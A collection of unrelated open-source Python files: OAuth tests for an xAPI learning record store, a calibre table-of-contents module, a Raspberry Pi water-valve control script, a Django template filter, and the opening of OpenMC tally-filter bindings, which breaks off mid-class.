http_url=TEST_SERVER + '/XAPI/statements/', parameters=post_oauth_header_resource_params_dict)
post_signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
post_signature2 = post_signature_method2.sign(post_oauth_request2, self.consumer, access_token)
sig = oauth_header_resource_params.replace('"%s"' % post_signature, '"%s"' % post_signature2)
new_oauth_headers = sig.replace('oauth_nonce="resource_nonce"','oauth_nonce="post_differ_nonce"')
resp = self.client.post(TEST_SERVER + '/XAPI/statements/', data=stmt2, content_type="application/json",
Authorization=new_oauth_headers, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 200)
def test_update_activity_with_oauth_containing_user(self):
url = 'http://testserver/XAPI/statements'
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent",
"mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/passed",
"display": {"en-US":"passed"}},"object": {"id":"test://test/define/scope"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
# build stmt data and path
put_guid = str(uuid.uuid1())
stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}},
"object": {"id":"test://test/define/scope",
'definition': {'name': {'en-US':'testname', 'en-GB': 'altname'},
'description': {'en-US':'testdesc', 'en-GB': 'altdesc'},'type': 'type:course',
'interactionType': 'other'}}})
param = {"statementId":put_guid}
path = "%s?%s" % (url, urllib.urlencode(param))
# START PUT STMT
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='statements/write statements/read define')
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
# Put statements - should update existing activity since jane is in oauth group
resp = self.client.put(path, data=stmt, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 204)
acts = Activity.objects.all()
self.assertEqual(len(acts), 1)
act = acts[0].to_dict()
self.assertEqual(act['id'], 'test://test/define/scope')
self.assertIn('definition', act)
def test_update_activity_created_with_oauth(self):
url = 'http://testserver/XAPI/statements'
# build stmt data and path
put_guid = str(uuid.uuid1())
stmt = {"actor":{"objectType": "Agent",
"mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/passed",
"display": {"en-US":"passed"}},"object": {"id":"test://test/define/scope"}}
param = {"statementId":put_guid}
path = "%s?%s" % (url, urllib.urlencode(param))
# START PUT STMT
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='statements/write statements/read define')
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
# Put statements - should update existing activity since jane is in oauth group
resp = self.client.put(path, data=stmt, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 204)
# ==================================================================
stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}},
"object": {"id":"test://test/define/scope",
'definition': {'name': {'en-US':'testname', 'en-GB': 'altname'},
'description': {'en-US':'testdesc', 'en-GB': 'altdesc'},'type': 'type:course',
'interactionType': 'other'}}})
stmt_post = self.client.post(reverse(statements), stmt, content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
acts = Activity.objects.all()
self.assertEqual(len(acts), 1)
act = acts[0].to_dict()
self.assertEqual(act['id'], 'test://test/define/scope')
self.assertIn('definition', act)
def test_multiple_client_get(self):
url = 'http://testserver/XAPI/statements'
# build stmt data and path
put_guid = str(uuid.uuid1())
stmt = {"actor":{"objectType": "Agent",
"mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/passed",
"display": {"en-US":"passed"}},"object": {"id":"test://test/define/scope"}}
param = {"statementId":put_guid}
path = "%s?%s" % (url, urllib.urlencode(param))
# START PUT STMT
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='statements/write statements/read define')
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
# Put statements - should update existing activity since jane is in oauth group
resp = self.client.put(path, data=stmt, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 204)
# ==================================================================
# build stmt data and path
put_guid2 = str(uuid.uuid1())
stmt2 = {"actor":{"objectType": "Agent",
"mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/passed",
"display": {"en-US":"passed"}},"object": {"id":"test://mult-test"}}
param2 = {"statementId":put_guid2}
path2 = "%s?%s" % (url, urllib.urlencode(param2))
# START PUT STMT
oauth_header_resource_params2, access_token2 = self.oauth_handshake(scope_type='statements/write define', consumer=self.consumer2jane)
# from_token_and_callback takes a dictionary
param_list2 = oauth_header_resource_params2.split(",")
oauth_header_resource_params_dict2 = {}
for p in param_list2:
item = p.split("=")
oauth_header_resource_params_dict2[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict2['OAuth realm']
# Create oauth request and add signature
oauth_request2 = oauth.Request.from_token_and_callback(access_token2, http_method='PUT',
http_url=path2, parameters=oauth_header_resource_params_dict2)
signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method2.sign(oauth_request2, self.consumer2jane, access_token2)
oauth_header_resource_params2 += ',oauth_signature="%s"' % signature2
# Put statements - should update existing activity since jane is in oauth group
resp2 = self.client.put(path2, data=stmt2, content_type="application/json",
Authorization=oauth_header_resource_params2, X_Experience_API_Version="1.0.0")
self.assertEqual(resp2.status_code, 204)
# ==================================================================
stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}},
"object": {"id":"test://test/define/scope",
'definition': {'name': {'en-US':'testname', 'en-GB': 'altname'},
'description': {'en-US':'testdesc', 'en-GB': 'altdesc'},'type': 'type:course',
'interactionType': 'other'}}})
stmt_post = self.client.post(reverse(statements), stmt, content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
# ==================================================================
stmt_get = self.client.get(reverse(statements), X_Experience_API_Version="1.0.0", Authorization=self.jane_auth)
self.assertEqual(stmt_get.status_code, 200)
content = json.loads(stmt_get.content)
self.assertEqual(len(content['statements']), 3)
jane_clients = Consumer.objects.filter(user=self.user)
self.assertEqual(len(jane_clients), 2) | daafgo/Server_LRS | lrs/tests/OAuthTests.py | Python | apache-2.0 | 161,641 | 0.009385 |
#!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import with_statement
__license__ = 'GPL v3'
__copyright__ = '2009, Kovid Goyal <[email protected]>'
__docformat__ = 'restructuredtext en'
import re, uuid
from lxml import etree
from urlparse import urlparse
from collections import OrderedDict, Counter
from calibre.ebooks.oeb.base import XPNSMAP, TOC, XHTML, xml2text, barename
from calibre.ebooks import ConversionError
def XPath(x):
try:
return etree.XPath(x, namespaces=XPNSMAP)
except etree.XPathSyntaxError:
raise ConversionError(
'The syntax of the XPath expression %s is invalid.' % repr(x))
def isspace(x):
return not x or x.replace(u'\xa0', u'').isspace()
def at_start(elem):
' Return True if there is no content before elem '
body = XPath('ancestor-or-self::h:body')(elem)
if not body:
return True
body = body[0]
ancestors = frozenset(XPath('ancestor::*')(elem))
for x in body.iter():
if x is elem:
return True
if hasattr(getattr(x, 'tag', None), 'rpartition') and x.tag.rpartition('}')[-1] in {'img', 'svg'}:
return False
if isspace(getattr(x, 'text', None)) and (x in ancestors or isspace(getattr(x, 'tail', None))):
continue
return False
return False
class DetectStructure(object):
def __call__(self, oeb, opts):
self.log = oeb.log
self.oeb = oeb
self.opts = opts
self.log('Detecting structure...')
self.detect_chapters()
if self.oeb.auto_generated_toc or opts.use_auto_toc:
orig_toc = self.oeb.toc
self.oeb.toc = TOC()
self.create_level_based_toc()
if self.oeb.toc.count() < 1:
if not opts.no_chapters_in_toc and self.detected_chapters:
self.create_toc_from_chapters()
if self.oeb.toc.count() < opts.toc_threshold:
self.create_toc_from_links()
if self.oeb.toc.count() < 2 and orig_toc.count() > 2:
self.oeb.toc = orig_toc
else:
self.oeb.auto_generated_toc = True
self.log('Auto generated TOC with %d entries.' %
self.oeb.toc.count())
if opts.toc_filter is not None:
regexp = re.compile(opts.toc_filter)
for node in list(self.oeb.toc.iter()):
if not node.title or regexp.search(node.title) is not None:
self.log('Filtering', node.title if node.title else
'empty node', 'from TOC')
self.oeb.toc.remove(node)
if opts.page_breaks_before is not None:
pb_xpath = XPath(opts.page_breaks_before)
for item in oeb.spine:
for elem in pb_xpath(item.data):
try:
prev = elem.itersiblings(tag=etree.Element,
preceding=True).next()
if (barename(elem.tag) in {'h1', 'h2'} and barename(
prev.tag) in {'h1', 'h2'} and (not prev.tail or
not prev.tail.split())):
# We have two adjacent headings, do not put a page
# break on the second one
continue
except StopIteration:
pass
style = elem.get('style', '')
if style:
style += '; '
elem.set('style', style+'page-break-before:always')
for node in self.oeb.toc.iter():
if not node.title or not node.title.strip():
node.title = _('Unnamed')
if self.opts.start_reading_at:
self.detect_start_reading()
def detect_start_reading(self):
expr = self.opts.start_reading_at
try:
expr = XPath(expr)
except:
self.log.warn(
'Invalid start reading at XPath expression, ignoring: %s'%expr)
return
for item in self.oeb.spine:
if not hasattr(item.data, 'xpath'):
continue
matches = expr(item.data)
if matches:
elem = matches[0]
eid = elem.get('id', None)
if not eid:
eid = u'start_reading_at_'+unicode(uuid.uuid4()).replace(u'-', u'')
elem.set('id', eid)
if u'text' in self.oeb.guide:
self.oeb.guide.remove(u'text')
self.oeb.guide.add(u'text', u'Start', item.href+u'#'+eid)
self.log('Setting start reading at position to %s in %s'%(
self.opts.start_reading_at, item.href))
return
self.log.warn("Failed to find start reading at position: %s"%
self.opts.start_reading_at)
def get_toc_parts_for_xpath(self, expr):
# if an attribute is selected by the xpath expr then truncate it
# from the path and instead return it as where to find the title text
title_attribute_regex = re.compile('/@([-\w]+)$')
match = title_attribute_regex.search(expr)
if match is not None:
return expr[0:match.start()], match.group(1)
return expr, None
def detect_chapters(self):
self.detected_chapters = []
self.chapter_title_attribute = None
def find_matches(expr, doc):
try:
ans = XPath(expr)(doc)
len(ans)
return ans
except:
self.log.warn('Invalid chapter expression, ignoring: %s'%expr)
return []
if self.opts.chapter:
chapter_path, title_attribute = self.get_toc_parts_for_xpath(self.opts.chapter)
self.chapter_title_attribute = title_attribute
for item in self.oeb.spine:
for x in find_matches(chapter_path, item.data):
self.detected_chapters.append((item, x))
chapter_mark = self.opts.chapter_mark
page_break_before = 'display: block; page-break-before: always'
page_break_after = 'display: block; page-break-after: always'
c = Counter()
for item, elem in self.detected_chapters:
c[item] += 1
text = xml2text(elem).strip()
text = re.sub(r'\s+', ' ', text.strip())
self.log('\tDetected chapter:', text[:50])
if chapter_mark == 'none':
continue
if chapter_mark == 'rule':
mark = etree.Element(XHTML('hr'))
elif chapter_mark == 'pagebreak':
if c[item] < 3 and at_start(elem):
# For the first two elements in this item, check if they
# are at the start of the file, in which case inserting a
# page break in unnecessary and can lead to extra blank
# pages in the PDF Output plugin. We need to use two as
# feedbooks epubs match both a heading tag and its
# containing div with the default chapter expression.
continue
mark = etree.Element(XHTML('div'), style=page_break_after)
else: # chapter_mark == 'both':
mark = etree.Element(XHTML('hr'), style=page_break_before)
try:
elem.addprevious(mark)
except TypeError:
self.log.exception('Failed to mark chapter')
def create_level_based_toc(self):
if self.opts.level1_toc is not None:
self.add_leveled_toc_items()
def create_toc_from_chapters(self):
counter = self.oeb.toc.next_play_order()
for item, elem in self.detected_chapters:
text, href = self.elem_to_link(item, elem, self.chapter_title_attribute, counter)
self.oeb.toc.add(text, href, play_order=counter)
counter += 1
def create_toc_from_links(self):
num = 0
for item in self.oeb.spine:
for a in XPath('//h:a[@href]')(item.data):
href = a.get('href')
try:
purl = urlparse(href)
except ValueError:
self.log.warning('Ignoring malformed URL:', href)
continue
if not purl[0] or purl[0] == 'file':
href, frag = purl.path, purl.fragment
href = item.abshref(href)
if frag:
href = '#'.join((href, frag))
if not self.oeb.toc.has_href(href):
text = xml2text(a)
text = text[:100].strip()
if (not self.opts.duplicate_links_in_toc and
self.oeb.toc.has_text(text)):
continue
num += 1
self.oeb.toc.add(text, href,
play_order=self.oeb.toc.next_play_order())
if self.opts.max_toc_links > 0 and \
num >= self.opts.max_toc_links:
self.log('Maximum TOC links reached, stopping.')
return
def elem_to_link(self, item, elem, title_attribute, counter):
text = ''
if title_attribute is not None:
text = elem.get(title_attribute, '')
if not text:
text = xml2text(elem).strip()
if not text:
text = elem.get('title', '')
if not text:
text = elem.get('alt', '')
text = re.sub(r'\s+', ' ', text.strip())
text = text[:1000].strip()
id = elem.get('id', 'calibre_toc_%d'%counter)
elem.set('id', id)
href = '#'.join((item.href, id))
return text, href
def add_leveled_toc_items(self):
added = OrderedDict()
added2 = OrderedDict()
counter = 1
def find_matches(expr, doc):
try:
ans = XPath(expr)(doc)
len(ans)
return ans
except:
self.log.warn('Invalid ToC expression, ignoring: %s'%expr)
return []
for document in self.oeb.spine:
previous_level1 = list(added.itervalues())[-1] if added else None
previous_level2 = list(added2.itervalues())[-1] if added2 else None
level1_toc, level1_title = self.get_toc_parts_for_xpath(self.opts.level1_toc)
for elem in find_matches(level1_toc, document.data):
text, _href = self.elem_to_link(document, elem, level1_title, counter)
counter += 1
if text:
node = self.oeb.toc.add(text, _href,
play_order=self.oeb.toc.next_play_order())
added[elem] = node
# node.add(_('Top'), _href)
if self.opts.level2_toc is not None and added:
level2_toc, level2_title = self.get_toc_parts_for_xpath(self.opts.level2_toc)
for elem in find_matches(level2_toc, document.data):
level1 = None
for item in document.data.iterdescendants():
if item in added:
level1 = added[item]
elif item == elem:
if level1 is None:
if previous_level1 is None:
break
level1 = previous_level1
text, _href = self.elem_to_link(document, elem, level2_title, counter)
counter += 1
if text:
added2[elem] = level1.add(text, _href,
play_order=self.oeb.toc.next_play_order())
break
if self.opts.level3_toc is not None and added2:
level3_toc, level3_title = self.get_toc_parts_for_xpath(self.opts.level3_toc)
for elem in find_matches(level3_toc, document.data):
level2 = None
for item in document.data.iterdescendants():
if item in added2:
level2 = added2[item]
elif item == elem:
if level2 is None:
if previous_level2 is None:
break
level2 = previous_level2
text, _href = \
self.elem_to_link(document, elem, level3_title, counter)
counter += 1
if text:
level2.add(text, _href,
play_order=self.oeb.toc.next_play_order())
break
| sharad/calibre | src/calibre/ebooks/oeb/transforms/structure.py | Python | gpl-3.0 | 13,406 | 0.00358 |
#!/usr/bin/python
import sys, signal, logging, time, RPi.GPIO as GPIO
FLOATSW_HIGH_WL = 26 # high water level float switch
WATER_VALVE = 10 # GPIO port for the Water Electo valve, High by default after boot
VALVE_CHGSTATE_TIMER = 25 # Electro valve needs roughly 20 seconds to switch from open to close and vice versa
logger = None
def Setup():
global logger
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
handler = logging.FileHandler('/var/log/rodi.log')
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(message)s',"%Y-%m-%d %H:%M:%S")
handler.setFormatter(formatter)
logger.addHandler(handler)
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(WATER_VALVE, GPIO.OUT)
GPIO.setup(FLOATSW_HIGH_WL, GPIO.IN, pull_up_down=GPIO.PUD_UP) #, initial = GPIO.HIGH)
if not sys.stdout.isatty():
sys.stderr = open('/var/log/rodi_stderr.log', 'a')
sys.stdout = open('/var/log/rodi_stdout.log', 'a')
def Alert(message):
global logger
logger.info(message) # log the event
print(message)
logger.handlers[0].flush()
def Close_valve():
GPIO.output(WATER_VALVE, False)
Alert("Closing the RO/DI valve")
def Open_valve():
if GPIO.input(WATER_VALVE) == True:
Alert("RO/DI Valve already opened")
sys.exit(5)
else:
Alert("Opening the RO/DI valve")
GPIO.output(WATER_VALVE, True)
time.sleep(VALVE_CHGSTATE_TIMER)
def Refilling():
if GPIO.input(WATER_VALVE) == True:
return True
else:
return False
class GracefulKiller:
kill_now = False
def __init__(self):
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def exit_gracefully(self,signum, frame):
self.kill_now = True
if not len(sys.argv) > 1:
print("You must provide one numerical argument to this function (duration in seconds). Exiting.")
sys.exit(1)
if sys.argv[1] != "close" and sys.argv[1] != "stop" and not sys.argv[1].isdigit():
print("Value is neither 'close', 'stop' or a refill duration expressed in seconds")
sys.exit(1)
i = 0
killer = GracefulKiller()
Setup()
if sys.argv[1] == "close" or sys.argv[1] == "stop":
Close_valve()
if str.count(subprocess.check_output(["ps", "aux"]), "rodi") > 1:
Alert("Warning, we were called while another instance of rodi.py was already in Memory")
sys.exit(1)
if GPIO.input(FLOATSW_HIGH_WL) == 0:
Alert("Water level in sump already high, refilling would be dangerous, exiting")
if GPIO.input(WATER_VALVE) == True:
Alert("RO/DI Valve already opened while high water in the sump, closing.")
Close_valve()
sys.exit(3)
if sys.argv[1].isdigit():
Alert("Not already refilling, sump water level normal, proceeding.")
Alert("Refilling for " + sys.argv[1] + " seconds")
try:
Open_valve()
while i<VALVE_CHGSTATE_TIMER+int(sys.argv[1]):
time.sleep(1)
i=i+1
if GPIO.input(FLOATSW_HIGH_WL) == 0:
Alert("Water level in sump is now high, stopping the refill")
Close_valve()
sys.exit(3)
break
if killer.kill_now:
Alert("Caught a Sigterm, Sigkill or CTRL+C, exiting.")
Close_valve()
sys.exit(2)
break
Alert("Refill done, exiting.")
Close_valve()
sys.exit(0)
except (RuntimeError, IOError):
Alert("Caught an exception, exiting.")
Close_valve()
sys.exit(4)
# Exit code :
# 5 : already refilling or cannot create lock file
# 4 : Caught an exception
# 3 : water is high either at start or during the refill
# 2 : a sigkill, sigterm or keyboard CTRL+C signal was received
# 1 : incorrect parameter received
# 0 : all went fine
| aquamonitor/Aquamonitor | rodi.py | Python | lgpl-3.0 | 4,109 | 0.011682 |
from django import template
register = template.Library()
@register.filter
def package_usage(user):
return user.package_set.all()
| miketheman/opencomparison | profiles/templatetags/profile_tags.py | Python | mit | 137 | 0 |
from collections.abc import Mapping
from ctypes import c_int, c_int32, c_double, c_char_p, POINTER, \
create_string_buffer, c_size_t
from weakref import WeakValueDictionary
import numpy as np
from numpy.ctypeslib import as_array
from openmc.exceptions import AllocationError, InvalidIDError
from . import _dll
from .core import _FortranObjectWithID
from .error import _error_handler
from .material import Material
from .mesh import RegularMesh
__all__ = [
'Filter', 'AzimuthalFilter', 'CellFilter', 'CellbornFilter', 'CellfromFilter',
'CellInstanceFilter', 'DistribcellFilter', 'DelayedGroupFilter', 'EnergyFilter',
'EnergyoutFilter', 'EnergyFunctionFilter', 'LegendreFilter', 'MaterialFilter',
'MeshFilter', 'MeshSurfaceFilter', 'MuFilter', 'ParticleFilter', 'PolarFilter',
'SphericalHarmonicsFilter', 'SpatialLegendreFilter', 'SurfaceFilter',
'UniverseFilter', 'ZernikeFilter', 'ZernikeRadialFilter', 'filters'
]
# Tally functions
_dll.openmc_cell_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_int32)), POINTER(c_int32)]
_dll.openmc_cell_filter_get_bins.restype = c_int
_dll.openmc_cell_filter_get_bins.errcheck = _error_handler
_dll.openmc_energy_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_double)), POINTER(c_size_t)]
_dll.openmc_energy_filter_get_bins.restype = c_int
_dll.openmc_energy_filter_get_bins.errcheck = _error_handler
_dll.openmc_energy_filter_set_bins.argtypes = [c_int32, c_size_t, POINTER(c_double)]
_dll.openmc_energy_filter_set_bins.restype = c_int
_dll.openmc_energy_filter_set_bins.errcheck = _error_handler
_dll.openmc_energyfunc_filter_set_data.restype = c_int
_dll.openmc_energyfunc_filter_set_data.errcheck = _error_handler
_dll.openmc_energyfunc_filter_set_data.argtypes = [
c_int32, c_size_t, POINTER(c_double), POINTER(c_double)]
_dll.openmc_energyfunc_filter_get_energy.resttpe = c_int
_dll.openmc_energyfunc_filter_get_energy.errcheck = _error_handler
_dll.openmc_energyfunc_filter_get_energy.argtypes = [
c_int32, POINTER(c_size_t), POINTER(POINTER(c_double))]
_dll.openmc_energyfunc_filter_get_y.resttpe = c_int
_dll.openmc_energyfunc_filter_get_y.errcheck = _error_handler
_dll.openmc_energyfunc_filter_get_y.argtypes = [
c_int32, POINTER(c_size_t), POINTER(POINTER(c_double))]
_dll.openmc_filter_get_id.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_filter_get_id.restype = c_int
_dll.openmc_filter_get_id.errcheck = _error_handler
_dll.openmc_filter_get_type.argtypes = [c_int32, c_char_p]
_dll.openmc_filter_get_type.restype = c_int
_dll.openmc_filter_get_type.errcheck = _error_handler
_dll.openmc_filter_set_id.argtypes = [c_int32, c_int32]
_dll.openmc_filter_set_id.restype = c_int
_dll.openmc_filter_set_id.errcheck = _error_handler
_dll.openmc_get_filter_index.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_get_filter_index.restype = c_int
_dll.openmc_get_filter_index.errcheck = _error_handler
_dll.openmc_legendre_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_legendre_filter_get_order.restype = c_int
_dll.openmc_legendre_filter_get_order.errcheck = _error_handler
_dll.openmc_legendre_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_legendre_filter_set_order.restype = c_int
_dll.openmc_legendre_filter_set_order.errcheck = _error_handler
_dll.openmc_material_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_int32)), POINTER(c_size_t)]
_dll.openmc_material_filter_get_bins.restype = c_int
_dll.openmc_material_filter_get_bins.errcheck = _error_handler
_dll.openmc_material_filter_set_bins.argtypes = [c_int32, c_size_t, POINTER(c_int32)]
_dll.openmc_material_filter_set_bins.restype = c_int
_dll.openmc_material_filter_set_bins.errcheck = _error_handler
_dll.openmc_mesh_filter_get_mesh.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_mesh_filter_get_mesh.restype = c_int
_dll.openmc_mesh_filter_get_mesh.errcheck = _error_handler
_dll.openmc_mesh_filter_set_mesh.argtypes = [c_int32, c_int32]
_dll.openmc_mesh_filter_set_mesh.restype = c_int
_dll.openmc_mesh_filter_set_mesh.errcheck = _error_handler
_dll.openmc_meshsurface_filter_get_mesh.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_meshsurface_filter_get_mesh.restype = c_int
_dll.openmc_meshsurface_filter_get_mesh.errcheck = _error_handler
_dll.openmc_meshsurface_filter_set_mesh.argtypes = [c_int32, c_int32]
_dll.openmc_meshsurface_filter_set_mesh.restype = c_int
_dll.openmc_meshsurface_filter_set_mesh.errcheck = _error_handler
_dll.openmc_new_filter.argtypes = [c_char_p, POINTER(c_int32)]
_dll.openmc_new_filter.restype = c_int
_dll.openmc_new_filter.errcheck = _error_handler
_dll.openmc_spatial_legendre_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_spatial_legendre_filter_get_order.restype = c_int
_dll.openmc_spatial_legendre_filter_get_order.errcheck = _error_handler
_dll.openmc_spatial_legendre_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_spatial_legendre_filter_set_order.restype = c_int
_dll.openmc_spatial_legendre_filter_set_order.errcheck = _error_handler
_dll.openmc_sphharm_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_sphharm_filter_get_order.restype = c_int
_dll.openmc_sphharm_filter_get_order.errcheck = _error_handler
_dll.openmc_sphharm_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_sphharm_filter_set_order.restype = c_int
_dll.openmc_sphharm_filter_set_order.errcheck = _error_handler
_dll.openmc_zernike_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_zernike_filter_get_order.restype = c_int
_dll.openmc_zernike_filter_get_order.errcheck = _error_handler
_dll.openmc_zernike_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_zernike_filter_set_order.restype = c_int
_dll.openmc_zernike_filter_set_order.errcheck = _error_handler
_dll.tally_filters_size.restype = c_size_t
class Filter(_FortranObjectWithID):
__instances = WeakValueDictionary()
def __new__(cls, obj=None, uid=None, new=True, index=None):
mapping = filters
if index is None:
if new:
# Determine ID to assign
if uid is None:
uid = max(mapping, default=0) + 1
else:
if uid in mapping:
raise AllocationError('A filter with ID={} has already '
'been allocated.'.format(uid))
# Set the filter type -- note that the filter_type attribute
# only exists on subclasses!
index = c_int32()
_dll.openmc_new_filter(cls.filter_type.encode(), index)
index = index.value
else:
index = mapping[uid]._index
if index not in cls.__instances:
instance = super().__new__(cls)
instance._index = index
if uid is not None:
instance.id = uid
cls.__instances[index] = instance
return cls.__instances[index]
@property
def id(self):
filter_id = c_int32()
_dll.openmc_filter_get_id(self._index, filter_id)
return filter_id.value
@id.setter
def id(self, filter_id):
_dll.openmc_filter_set_id(self._index, filter_id)
class EnergyFilter(Filter):
filter_type = 'energy'
def __init__(self, bins=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if bins is not None:
self.bins = bins
@property
def bins(self):
energies = POINTER(c_double)()
n = c_size_t()
_dll.openmc_energy_filter_get_bins(self._index, energies, n)
return as_array(energies, (n.value,))
@bins.setter
def bins(self, bins):
# Get numpy array as a double*
energies = np.asarray(bins)
energies_p = energies.ctypes.data_as(POINTER(c_double))
_dll.openmc_energy_filter_set_bins(
self._index, len(energies), energies_p)
class EnergyoutFilter(EnergyFilter):
filter_type = 'energyout'
class AzimuthalFilter(Filter):
filter_type = 'azimuthal'
class CellFilter(Filter):
filter_type = 'cell'
@property
def bins(self):
cells = POINTER(c_int32)()
n = c_int32()
_dll.openmc_cell_filter_get_bins(self._index, cells, n)
return as_array(cells, (n.value,))
class CellbornFilter(Filter):
filter_type = 'cellborn'
class CellfromFilter(Filter):
filter_type = 'cellfrom'
class CellInstanceFilter(Filter):
filter_type = 'cellinstance'
class DelayedGroupFilter(Filter):
filter_type = 'delayedgroup'
class DistribcellFilter(Filter):
filter_type = 'distribcell'
class EnergyFunctionFilter(Filter):
filter_type = 'energyfunction'
def __new__(cls, energy=None, y=None, uid=None, new=True, index=None):
return super().__new__(cls, uid=uid, new=new, index=index)
def __init__(self, energy=None, y=None, uid=None, new=True, index=None):
if (energy is None) != (y is None):
raise AttributeError("Need both energy and y or neither")
super().__init__(uid, new, index)
if energy is not None:
self.set_data(energy, y)
def set_data(self, energy, y):
"""Set the interpolation information for the filter
Parameters
----------
energy : numpy.ndarray
Independent variable for the interpolation
y : numpy.ndarray
Dependent variable for the interpolation
"""
energy_array = np.asarray(energy)
y_array = np.asarray(y)
energy_p = energy_array.ctypes.data_as(POINTER(c_double))
y_p = y_array.ctypes.data_as(POINTER(c_double))
_dll.openmc_energyfunc_filter_set_data(
self._index, len(energy_array), energy_p, y_p)
@property
def energy(self):
return self._get_attr(_dll.openmc_energyfunc_filter_get_energy)
@property
def y(self):
return self._get_attr(_dll.openmc_energyfunc_filter_get_y)
def _get_attr(self, cfunc):
array_p = POINTER(c_double)()
n = c_size_t()
cfunc(self._index, n, array_p)
return as_array(array_p, (n.value, ))
class LegendreFilter(Filter):
filter_type = 'legendre'
def __init__(self, order=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if order is not None:
self.order = order
@property
def order(self):
temp_order = c_int()
_dll.openmc_legendre_filter_get_order(self._index, temp_order)
return temp_order.value
@order.setter
def order(self, order):
_dll.openmc_legendre_filter_set_order(self._index, order)
class MaterialFilter(Filter):
filter_type = 'material'
def __init__(self, bins=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if bins is not None:
self.bins = bins
@property
